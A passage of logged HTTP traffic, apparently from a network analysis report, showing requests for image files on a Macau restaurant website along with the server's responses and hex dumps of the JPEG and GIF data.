                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: */*
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
                                                                                                                                                              Mar 13, 2023 05:26:41.709136963 CET2890INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 888
                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:15:24 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "b629ef8a6b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:47 GMT
                                                                                                                                                              Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 64 00 64 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff db 00 84 00 02 02 02 02 02 02 02 02 02 02 03 02 02 02 03 04 03 02 02 03 04 05 04 04 04 04 04 05 06 05 05 05 05 05 05 06 06 07 07 08 07 07 06 09 09 0a 0a 09 09 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 01 03 03 03 05 04 05 09 06 06 09 0d 0b 09 0b 0d 0f 0e 0e 0e 0e 0f 0f 0c 0c 0c 0c 0c 0f 0f 0c 0c 0c 0c 0c 0c 0f 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 00 1c 00 28 03 01 11 00 02 11 01 03 11 01 ff c4 00 7b 00 01 00 02 03 01 00 00 00 00 00 00 00 00 00 00 00 00 01 07 03 05 06 04 01 01 00 03 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 08 10 00 01 04 01 04 02 01 04 03 01 00 00 00 00 00 00 01 02 03 04 05 11 00 12 22 06 21 13 15 31 41 81 14 61 32 42 07 11 00 02 02 01 02 05 05 01 00 00 00 00 00 00 00 00 01 11 00 02 31 21 12 41 51 61 03 13 71 81 b1 04 14 a1 ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 bf 77 eb e5 99 e0 46 fd 22 37 e9 11 bf 48 8d fa 44 b3 67 37 42 ef 43 e8 06 e6 ce 7c 05 83 6d e8 10 a0 b5 2c 28 7e ca 73 b8 b9 2e 36 dc 78 c6 01 fc 6b a4 81 b2 af ac ee b0 a1 ec d3 71 23 38 0f 8f a8 9d 1f 7d a5 a8 5f 63 ef bd 9a e8 cc 93 0a b2 75 7c 18 d5 f0 9c 43 0e ba f4 88 a1 7b 96 eb 8d 3e 94 25 29 6c ff 00 83 92 71 e3 56 ee d0 6e b5 8c d7 ec f6 eb be f7 b3 40 81 a7 51 ef 35 0e f4 8e b1 0d 37 16 92 a4 d9 bf 4d 1f af d7 df d6 45 69 6c a2 50 4c e7 90 d0 61 f5 a9 a5 23 20 a8 f3 4a 47 8c 2b 69 fe a6 3c 55 0c ea 93 94 3f 5a 81 92 4a da 2c 30 f5 e0 66 47 ba 5f 50 7a 4a 6b 60 3d 70 89 b6 3d 6d 5d 86 b5 f9 0e c7 2d 31 88 c6 42 63 ba 94 34 0b b9 08 50 2b 05 18 f1 c4 e9 e2 ae 03 c3 83 f5 fb 64 a0 d9 ae e1 8e 4d 63 5f 5d 24 0f f9 fd 04 6a fa e4 59 5a a2 24 fb 1a 51 6b f2 ae 5a d7 32 c3 4e bc c9 7d 86 0d 7b 84 49 58 50 da 82 b0 a1 c8 e4 27 03 4f 0d 56 bc b9 8f 88 fc b4 00 33 a9 0d b1 ea 02 cc a8 a4 5b cf 97 02 ba b2 43 fe c8 35 3e ef 8f 63 62 47 af de a0 b7 39 00 14 72 a1 9f 24 ff 00 1a c8 92 42 9c 66 e4 80 0e 04 de 8e f5 d9 ff 00 7a d6 c1 cb 06 e4 3f 78 1b 16 cd 48 8b 19 f8 f2 3d 20 06 ca e3 ba d2 99 25 20 78 3b 32 3f 3a b7 92 cd f3 9a 7e 8b b2 5e 73 a0 f8 c4 f2 49 ed bd 82 62 ad d5 26 c5 4f 1b d6 1a 8d 66 0b 6d e1 6c b0 b4 2d a6 d2 02 70 da 50 50 9c 04 6d fa 63 e9 a8 37 b1 7d 65 4f 7a e5 b3 9c c8 47 6c be 6e 54 79 a8 9f 89 31 6b 7e 21 87 3d 4d 71 87 ea 53 3e ac 6c c1 e0 a2 37 11 bb ef 9c e9 bc c7 9a ed be 0b da 65 1d c2 f0 d7 b3 58 f3 90 e6 c5 8c c1 8d 15 53 20 43 94 f3 4c 9c f0 6d f7 d9 5b a8 03 3c 76 a8 6d fb 63 4d e5 29 3e 7b 25 a1 1d 40 3f d2 1c e5 79 6a 26 51 cb 48 8e 5a 44 72 d2 23 96 91 3f ff d9
                                                                                                                                                              Data Ascii: JFIFddDuckyPAdobed({"!1Aa2B1!AQaq?wF"7HDg7BC|m,(~s.6xkq#8}_cu|C{>%)lqVn@Q57MEilPLa# JG+i<U?ZJ,0fG_PzJk`=p=m]-1Bc4P+dMc_]$jYZ$QkZ2N}{IXP'OV3[C5>cbG9r$Bfz?xH= % x;2?:~^sIb&Ofml-pPPmc7}eOzGlnTy1k~!=MqS>l7eXS CLm[<vmcM)>{%@?yj&QHZDr#?
                                                                                                                                                              Mar 13, 2023 05:26:42.265053988 CET2922OUTGET /images/icon_photo.jpg HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                              Referer: http://www.gourmethousemacau.com/AboutUs.asp
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
                                                                                                                                                              Mar 13, 2023 05:26:42.504267931 CET2936INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 7351
                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:15:24 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "9e1c7ff7a6b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:48 GMT
                                                                                                                                                              Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 64 00 64 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff db 00 84 00 02 02 02 02 02 02 02 02 02 02 03 02 02 02 03 04 03 02 02 03 04 05 04 04 04 04 04 05 06 05 05 05 05 05 05 06 06 07 07 08 07 07 06 09 09 0a 0a 09 09 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 01 03 03 03 05 04 05 09 06 06 09 0d 0b 09 0b 0d 0f 0e 0e 0e 0e 0f 0f 0c 0c 0c 0c 0c 0f 0f 0c 0c 0c 0c 0c 0c 0f 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 00 37 00 b9 03 01 11 00 02 11 01 03 11 01 ff c4 00 b9 00 00 01 04 03 01 01 00 00 00 00 00 00 00 00 00 00 00 04 05 06 07 03 08 09 02 01 01 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 10 00 01 03 03 02 03 02 0c 04 04 03 09 00 00 00 00 02 01 03 04 11 05 06 00 12 21 13 07 31 14 61 d1 22 94 d4 15 55 95 17 57 08 18 41 51 71 32 81 a1 23 16 62 82 c2 91 b1 42 72 92 a2 a3 24 54 11 00 01 02 03 03 08 08 04 04 03 05 09 00 00 00 00 01 02 03 00 11 04 21 12 05 31 41 51 a1 d1 d2 93 14 61 71 22 52 13 54 15 06 81 c1 32 16 91 b1 23 07 f0 42 b2 72 33 73 b3 24 e1 f1 82 92 a2 53 63 c3 34 ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 eb 0f 51 7a 9f 77 6a ef 32 cf 65 9c b6 a8 16 e5 10 9b 3d b1 ab c4 ea a2 ae c6 f8 a7 1e 1f 9a 78 75 e3 5e e6 f7 35 55 4d 5b 8c 30 e1 6d 96 cd de cf 65 6a 52 6c 5f 6c 76 80 0a ec 80 92 9f a4 92 6d 8c 9a da d5 21 57 53 64 b2 9c bf 01 15 77 c4 cc 85 38 7a f6 f6 e7 f8 fb e8 05 7f cb c9 2f f7 eb 96 e6 ea bc c3 fc 77 77 e3 3f d4 9c d2 75 6e c7 df 89 d9 0f b6 af 7e 7e 1e 8f a3 9b aa f3 0f f1 dd df 83 d4 9c d2 75 6e c1 f1 3b 21 f6 d5 ef cf c3 d1 f4 73 75 5e 61 fe 3b bb f0 7a 93 9a 4e ad d8 3e 27 64 3e da bd f9 f8 7a 3e 8e 6e ab cc 3f c7 77 7e 0f 52 73 49 d5 bb 07 c4 ec 87 db 57 bf 3f 0f 47 d1 cd d5 79 87 f8 ee ef c1 ea 4e 69 3a b7 60 f8 9d 90 fb 6a f7 e7 e1 e8 fa 39 ba af 30 ff 00 1d dd f8 3d 49 cd 27 56 ec 1f 13 b2 1f 6d 5e fc fc 3d 1f 47 37 55 e6 1f e3 bb bf 07 a9 39 a4 ea dd 83 e2 76 43 ed ab df 9f 87 a3 e8 e6 ea bc c3 fc 77 77 e0 f5 27 34 9d 5b b0 7c 4e c8 7d b5 7b f3 f0 f4 7d 1c dd 57 98 7f 8e ee fc 1e a4 e6 93 ab 76 0f 89 d9 0f b6 af 7e 7e 1e 8f a3 9b aa f3 0f f1 dd df 83 d4 9c d2 75 6e c1 f1 3b 21 f6 d5 ef cf c3 d1 f4 73 75 5e 61 fe 3b bb f0 7a 93 9a 4e ad d8 3e 27 64 3e da bd f9 f8 7a 3e 8e 6e ab cc 3f c7 77 7e 0f 52 73 49 d5 bb 07 c4 ec 87 db 57 bf 3f 0f 47 d1 cd d5 79 87 f8 ee ef c1 ea 4e 69 3a b7 60 f8 9d 90 fb 6a f7 e7 e1 e8 fa 39 ba af 30 ff 00 1d dd f8 3d 49 cd 27 56 ec 1f 13 b2 1f 6d 5e fc fc 3d 1f 47 37 55 e6 1f e3 bb bf 07 a9 39 a4 ea dd 83 e2 76 43 ed ab df 9f 87 a3 e8 e6 ea bc c3 fc 77 77 e0 f5 27 34 9d 5b b0 7c 4e c8 7d b5 7b f3 f0 f4 7d 1c dd 57 98 7f 8e ee fc 1e a4 e6 93 ab 76 0f 89 d9 0f b6 af 7e 7e 1e 8f a3 9b aa f3 0f f1 dd df 83 d4 9c d2 75 6e c1 f1 3b 21 f6 d5 ef cf c3 d1 f4 73 75 5e 61 fe 3b bb f0 7a 93 9a 4e ad d8 3e 27 64 3e da bd f9 f8 7a 3e 8e 6e ab cc 3f c7 77 7e 0f 52 73 49 d5 bb 19 58 ea 76 44 8f 36 49 91 5d a3 a8 aa 50 9f 7c 64 b7 fe 70 46 db 5a 7e 7a 7a 2b ea d0 42 93 52 f8 23 4b ae 28 7f ca a5 14 9f 88 30 e4 e2
                                                                                                                                                              Data Ascii: JFIFddDuckyPAdobed7!1a"UWAQq2#bBr$T!1AQaq"RT2#Br3s$Sc4?Qzwj2e=xu^5UM[0mejRl_lvm!WSdw8z/ww?un~~un;!su^a;zN>'d>z>n?w~RsIW?GyNi:`j90=I'Vm^=G7U9vCww'4[|N}{}Wv~~un;!su^a;zN>'d>z>n?w~RsIW?GyNi:`j90=I'Vm^=G7U9vCww'4[|N}{}Wv~~un;!su^a;zN>'d>z>n?w~RsIXvD6I]P|dpFZ~zz+BR#K(0
                                                                                                                                                              Mar 13, 2023 05:26:42.547708035 CET2946OUTGET /images/icon_photo.jpg HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: */*
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
                                                                                                                                                              Mar 13, 2023 05:26:42.752635002 CET2962INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 7351
                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:15:24 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "9e1c7ff7a6b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:48 GMT
                                                                                                                                                              Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 64 00 64 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff db 00 84 00 02 02 02 02 02 02 02 02 02 02 03 02 02 02 03 04 03 02 02 03 04 05 04 04 04 04 04 05 06 05 05 05 05 05 05 06 06 07 07 08 07 07 06 09 09 0a 0a 09 09 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 01 03 03 03 05 04 05 09 06 06 09 0d 0b 09 0b 0d 0f 0e 0e 0e 0e 0f 0f 0c 0c 0c 0c 0c 0f 0f 0c 0c 0c 0c 0c 0c 0f 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 00 37 00 b9 03 01 11 00 02 11 01 03 11 01 ff c4 00 b9 00 00 01 04 03 01 01 00 00 00 00 00 00 00 00 00 00 00 04 05 06 07 03 08 09 02 01 01 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 10 00 01 03 03 02 03 02 0c 04 04 03 09 00 00 00 00 02 01 03 04 11 05 06 00 12 21 13 07 31 14 61 d1 22 94 d4 15 55 95 17 57 08 18 41 51 71 32 81 a1 23 16 62 82 c2 91 b1 42 72 92 a2 a3 24 54 11 00 01 02 03 03 08 08 04 04 03 05 09 00 00 00 00 01 02 03 00 11 04 21 12 05 31 41 51 a1 d1 d2 93 14 61 71 22 52 13 54 15 06 81 c1 32 16 91 b1 23 07 f0 42 b2 72 33 73 b3 24 e1 f1 82 92 a2 53 63 c3 34 ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 eb 0f 51 7a 9f 77 6a ef 32 cf 65 9c b6 a8 16 e5 10 9b 3d b1 ab c4 ea a2 ae c6 f8 a7 1e 1f 9a 78 75 e3 5e e6 f7 35 55 4d 5b 8c 30 e1 6d 96 cd de cf 65 6a 52 6c 5f 6c 76 80 0a ec 80 92 9f a4 92 6d 8c 9a da d5 21 57 53 64 b2 9c bf 01 15 77 c4 cc 85 38 7a f6 f6 e7 f8 fb e8 05 7f cb c9 2f f7 eb 96 e6 ea bc c3 fc 77 77 e3 3f d4 9c d2 75 6e c7 df 89 d9 0f b6 af 7e 7e 1e 8f a3 9b aa f3 0f f1 dd df 83 d4 9c d2 75 6e c1 f1 3b 21 f6 d5 ef cf c3 d1 f4 73 75 5e 61 fe 3b bb f0 7a 93 9a 4e ad d8 3e 27 64 3e da bd f9 f8 7a 3e 8e 6e ab cc 3f c7 77 7e 0f 52 73 49 d5 bb 07 c4 ec 87 db 57 bf 3f 0f 47 d1 cd d5 79 87 f8 ee ef c1 ea 4e 69 3a b7 60 f8 9d 90 fb 6a f7 e7 e1 e8 fa 39 ba af 30 ff 00 1d dd f8 3d 49 cd 27 56 ec 1f 13 b2 1f 6d 5e fc fc 3d 1f 47 37 55 e6 1f e3 bb bf 07 a9 39 a4 ea dd 83 e2 76 43 ed ab df 9f 87 a3 e8 e6 ea bc c3 fc 77 77 e0 f5 27 34 9d 5b b0 7c 4e c8 7d b5 7b f3 f0 f4 7d 1c dd 57 98 7f 8e ee fc 1e a4 e6 93 ab 76 0f 89 d9 0f b6 af 7e 7e 1e 8f a3 9b aa f3 0f f1 dd df 83 d4 9c d2 75 6e c1 f1 3b 21 f6 d5 ef cf c3 d1 f4 73 75 5e 61 fe 3b bb f0 7a 93 9a 4e ad d8 3e 27 64 3e da bd f9 f8 7a 3e 8e 6e ab cc 3f c7 77 7e 0f 52 73 49 d5 bb 07 c4 ec 87 db 57 bf 3f 0f 47 d1 cd d5 79 87 f8 ee ef c1 ea 4e 69 3a b7 60 f8 9d 90 fb 6a f7 e7 e1 e8 fa 39 ba af 30 ff 00 1d dd f8 3d 49 cd 27 56 ec 1f 13 b2 1f 6d 5e fc fc 3d 1f 47 37 55 e6 1f e3 bb bf 07 a9 39 a4 ea dd 83 e2 76 43 ed ab df 9f 87 a3 e8 e6 ea bc c3 fc 77 77 e0 f5 27 34 9d 5b b0 7c 4e c8 7d b5 7b f3 f0 f4 7d 1c dd 57 98 7f 8e ee fc 1e a4 e6 93 ab 76 0f 89 d9 0f b6 af 7e 7e 1e 8f a3 9b aa f3 0f f1 dd df 83 d4 9c d2 75 6e c1 f1 3b 21 f6 d5 ef cf c3 d1 f4 73 75 5e 61 fe 3b bb f0 7a 93 9a 4e ad d8 3e 27 64 3e da bd f9 f8 7a 3e 8e 6e ab cc 3f c7 77 7e 0f 52 73 49 d5 bb 19 58 ea 76 44 8f 36 49 91 5d a3 a8 aa 50 9f 7c 64 b7 fe 70 46 db 5a 7e 7a 7a 2b ea d0 42 93 52 f8 23 4b ae 28 7f ca a5 14 9f 88 30 e4 e2
                                                                                                                                                              Data Ascii: JFIFddDuckyPAdobed7!1a"UWAQq2#bBr$T!1AQaq"RT2#Br3s$Sc4?Qzwj2e=xu^5UM[0mejRl_lvm!WSdw8z/ww?un~~un;!su^a;zN>'d>z>n?w~RsIW?GyNi:`j90=I'Vm^=G7U9vCww'4[|N}{}Wv~~un;!su^a;zN>'d>z>n?w~RsIW?GyNi:`j90=I'Vm^=G7U9vCww'4[|N}{}Wv~~un;!su^a;zN>'d>z>n?w~RsIXvD6I]P|dpFZ~zz+BR#K(0
                                                                                                                                                              Mar 13, 2023 05:26:55.273231030 CET3079OUTGET /images/closelabel.gif HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                              Referer: http://www.gourmethousemacau.com/AboutUs.asp
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
                                                                                                                                                              Mar 13, 2023 05:26:55.515043974 CET3084INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 979
                                                                                                                                                              Content-Type: image/gif
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:15:22 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "a026a6f6a6b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:27:00 GMT
                                                                                                                                                              Data Raw: 47 49 46 38 39 61 42 00 16 00 e6 00 00 c0 c0 c0 c1 c1 c1 9d 9d 9d 59 59 59 d2 d2 d2 83 83 83 af af af f5 f5 f5 e4 e4 e4 50 50 50 b8 b8 b8 8c 8c 8c 94 94 94 54 54 54 56 56 56 dc dc dc 52 52 52 c9 c9 c9 51 51 51 58 58 58 55 55 55 ec ec ec 53 53 53 f6 f6 f6 fd fd fd ea ea ea fa fa fa a6 a6 a6 57 57 57 a2 a2 a2 4c 4c 4c 4f 4f 4f 66 66 66 f7 f7 f7 dd dd dd cc cc cc 60 60 60 7b 7b 7b a1 a1 a1 fc fc fc f0 f0 f0 de de de 6c 6c 6c b5 b5 b5 fb fb fb 95 95 95 cd cd cd ca ca ca 78 78 78 eb eb eb 4b 4b 4b e0 e0 e0 5f 5f 5f b9 b9 b9 df df df b4 b4 b4 86 86 86 70 70 70 63 63 63 e5 e5 e5 92 92 92 88 88 88 a9 a9 a9 6e 6e 6e 97 97 97 6f 6f 6f d5 d5 d5 8e 8e 8e ed ed ed 65 65 65 76 76 76 98 98 98 6d 6d 6d 7c 7c 7c ef ef ef e7 e7 e7 b1 b1 b1 b3 b3 b3 f1 f1 f1 79 79 79 5a 5a 5a 64 64 64 4d 4d 4d 73 73 73 67 67 67 96 96 96 87 87 87 e3 e3 e3 4e 4e 4e 69 69 69 db db db 7a 7a 7a ff ff ff fe fe fe 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 f9 04 00 00 00 00 00 2c 00 00 00 00 42 00 16 00 00 07 ff 80 5c 82 83 84 85 86 87 88 89 8a 8b 8c 8d 8e 8f 8c 5d 92 93 94 95 96 97 97 90 5c 27 8d 98 9e 9f 98 91 92 5c 2c 47 42 5c 96 5c 23 02 1a a8 a0 af a0 a2 5d 21 40 1e 51 22 ae 5d 82 2e 34 1e 55 17 94 15 5a 08 b0 5d 08 c3 97 07 5a 5a ba 8b a3 4d 32 03 16 45 5a ae aa 24 0d 03 1e 3e 92 04 0b 5b e0 0b 04 5d 00 5b cc 95 00 05 e0 5b 05 00 94 0a eb 05 2f 5c 01 eb eb 83 a3 19 5b 1f 03 09 54 36 82 46 d0 b0 30 00 0b 0e 14 5d 22 6c 59 10 41 4b 84 02 06 c8 99 ab 64 60 0b 03 02 5a 08 30 d8 12 51 a2 81 8c 1b 2e d0 e3 18 a0 64 00 7c f9 4a 24 18 d0 40 c5 0c 17 d8 06 48 b1 12 02 55 81 02 07 26 e5 94 78 4e 12 82 2d 02 2a 09 98 38 94 92 a0 7a 0f 0e 19 ad 50 82 1f 05 24 d8 26 24 e8 21 b2 8b 96 2d ee 2c 95 eb c9 b3 d2 55 05 5d 2a 2a d8 79 74 4b 52 43 95 b8 c4 48 02 61 80 03 0e 03 ff 20 0c a9 29 69 eb 25 bb 93 8a 5a 02 da a5 82 ba 2d 1b 10 94 6d 21 a0 b0 02 94 46 51 18 a1 30 60 42 83 0e ad 26 e1 45 37 31 ef 96 4b 7c bb 1c 00 f0 cd ec 48 c2 86 11 4f e2 a2 24 08 63 96 0c 74 4d 22 80 f5 6e 65 49 f0 c6 51 62 9d 55 32 c7 91 67 0b a5 9d 31 25 1b 05 07 71 4d 60 70 75 e0 e6 4e 63 39 27 5b cd 6c 99 98 e6 49 40 71 2b 1d 9d 42 85 04 69 59 40 38 98 00 a1 c3 70 49 0a 19 3a 2c b0 60 33 47 00 e8 99 55 bc 98 71 23 d8 b0 ec 37 6c 39 59 cf 80 c9 00 44 04 51 07 71 3d 01 8c 2b 2f 38 b0 9d 04 c2 b9 e2 4d 3c e3 94 63 4f 56 e9 ac b3 40 6d 0d 82 73 d8 48 f6 78 66 8d 08 20 40 00 45 02 25 64 20 48 0d 02 4e 20 41 07 27 50 72 8c 73 af 9c 78 c9 32 39 45 c2 c5 03 3a ac e4 5f 0c a8 08 b2 82 04 1c 70 20 c3 0d c5 f4 98 8a 33 5c 38 c1 00 04 1f 6c e1 a1 51 2b 58 90 40 30 0e 22 f8 e8 e4 28 ce e8 c2 02 0f 4f 54 90 0b 94 4c fc b0 c3 95 4f c2 22 0b 17 1a 54 75 09 06 4b 70 d9 e5 2b b2 34 e3 89 7e 67 fa 98 66 8f 81 00 00 3b
                                                                                                                                                              Data Ascii: GIF89aBYYYPPPTTTVVVRRRQQQXXXUUUSSSWWWLLLOOOfff```{{{lllxxxKKK___pppcccnnnoooeeevvvmmm|||yyyZZZdddMMMsssgggNNNiiizzz!,B\]\'\,GB\\#]!@Q"].4UZ]ZZM2EZ$>[][[/\[T6F0]"lYAKd`Z0Q.d|J$@HU&xN-*8zP$&$!-,U]**ytKRCHa )i%Z-m!FQ0`B&E71K|HO$ctM"neIQbU2g1%qM`puNc9'[lI@q+BiY@8pI:,`3GUq#7l9YDQq=+/8M<cOV@msHxf @E%d HN A'Prsx29E:_p 3\8lQ+X@0"(OTLO"TuKp+4~gf;
                                                                                                                                                              Mar 13, 2023 05:26:55.891829967 CET3084OUTGET /images/pic_aboutus.jpg HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: */*
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
                                                                                                                                                              Mar 13, 2023 05:26:56.097121954 CET3087INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 126846
                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:15:26 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "1ca9f0f8a6b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:27:01 GMT
                                                                                                                                                              Data Raw: ff d8 ff e1 30 1b 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 0c 01 00 00 03 00 00 00 01 00 c8 00 00 01 01 00 03 00 00 00 01 01 34 00 00 01 02 00 03 00 00 00 03 00 00 00 9e 01 06 00 03 00 00 00 01 00 02 00 00 01 12 00 03 00 00 00 01 00 01 00 00 01 15 00 03 00 00 00 01 00 03 00 00 01 1a 00 05 00 00 00 01 00 00 00 a4 01 1b 00 05 00 00 00 01 00 00 00 ac 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1e 00 00 00 b4 01 32 00 02 00 00 00 14 00 00 00 d2 87 69 00 04 00 00 00 01 00 00 00 e8 00 00 01 20 00 08 00 08 00 08 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 53 36 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 30 3a 30 36 3a 32 33 20 31 30 3a 34 30 3a 34 33 00 00 00 00 04 90 00 00 07 00 00 00 04 30 32 32 31 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 00 c8 a0 03 00 04 00 00 00 01 00 00 01 34 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 1a 00 05 00 00 00 01 00 00 01 6e 01 1b 00 05 00 00 00 01 00 00 01 76 01 28 00 03 00 00 00 01 00 02 00 00 02 01 00 04 00 00 00 01 00 00 01 7e 02 02 00 04 00 00 00 01 00 00 2e 95 00 00 00 00 00 00 00 48 00 00 00 01 00 00 00 48 00 00 00 01 ff d8 ff e2 0c 58 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0c 48 4c 69 6e 6f 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 ce 00 02 00 09 00 06 00 31 00 00 61 63 73 70 4d 53 46 54 00 00 00 00 49 45 43 20 73 52 47 42 00 00 00 00 